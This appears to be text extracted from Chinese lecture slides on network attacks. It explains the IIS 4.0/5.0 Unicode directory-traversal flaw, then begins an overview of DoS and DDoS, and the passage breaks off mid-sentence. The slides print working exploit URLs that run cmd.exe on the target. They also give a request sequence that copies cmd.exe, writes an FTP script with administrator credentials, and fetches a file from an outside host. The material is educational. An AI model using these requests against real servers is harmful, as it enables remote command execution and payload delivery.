工学网络攻击.pptxVIP

系统漏洞和后门系统漏洞是程序中无意造成的缺陷，它形成了一个不被注意的通道。漏洞也指无意的配置错误，如使用默认服务器配置。后门是一个在操作系统或程序中无证明文件的通道，通常是由软件开发人员故意放置在那里的，以便他们能够快速对产品进行支持。 IIS UNICODE 漏洞NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。IIS UNICODE 漏洞对于IIS 5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如%c1%hh或者%c0%hh,它会首先将其解码变成:0xc10xhh， 然后尝试打开这个文件，Windows 系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果 0x00= %hh 0x40的话，采用的解码的格式与下面的格式类似：%c1%hh - (0xc1 - 0xc0) * 0x40 + 0xhh%c0%hh - (0xc0 - 0xc0) * 0x40 + 0xhhIIS UNICODE 漏洞因此，利用这种编码，我们可以构造很多字符，例如:　%c1%1c - (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘　%c0%2f - (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘ ‘　攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。 IIS UNICODE 漏洞如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容：http://目标主机/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir利用这个漏洞查看系统文件内容也是可能的：http://目标主机/a.asp/..%c1%1c../..%c1%1c../winnt/win.iniIIS漏洞/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe/scripts/ccc.exe?/c+echo+open%3e+getfile/scripts/ccc.exe?/c+echo+open+getfile/scripts/ccc.exe?/c+type+getfile/scripts/ccc.exe?/c+echo+11%3e%3e+getfile/scripts/ccc.exe?/c+echo+11+getfile/scripts/ccc.exe?/c+echo+administrator%3e%3e+getfile/scripts/ccc.exe?/c+echo+administrator+getfile/scripts/ccc.exe?/c+echo+123456%3e%3e+getfile/scripts/ccc.exe?/c+echo+123456+getfile/scripts/ccc.exe?/c+echo+get+synful+getfile/scripts/ccc.exe?/c+echo+quit%3e%3e+getfile/scripts/ccc.exe?/c+echo+quit+getfile/scripts/ccc.exe?/c+ftp+-s:getfile拒绝服务攻击DoS（Denial of Service），其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。拒绝服务攻击带宽攻击指以极大的通信量冲击网络，使得所有可用网络资源都被消耗殆尽，最后导致合法的用户请求就无法通过。连通性攻击指用大量的连接请求冲击计算机，使得所有可用的操作系统资源都被消耗殆尽，最终计算机无法再处理合法用户的请求 分布式拒绝服务攻击(DDoS,Distributed Denial of Service) 指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DoS攻击，从而成倍地提高拒绝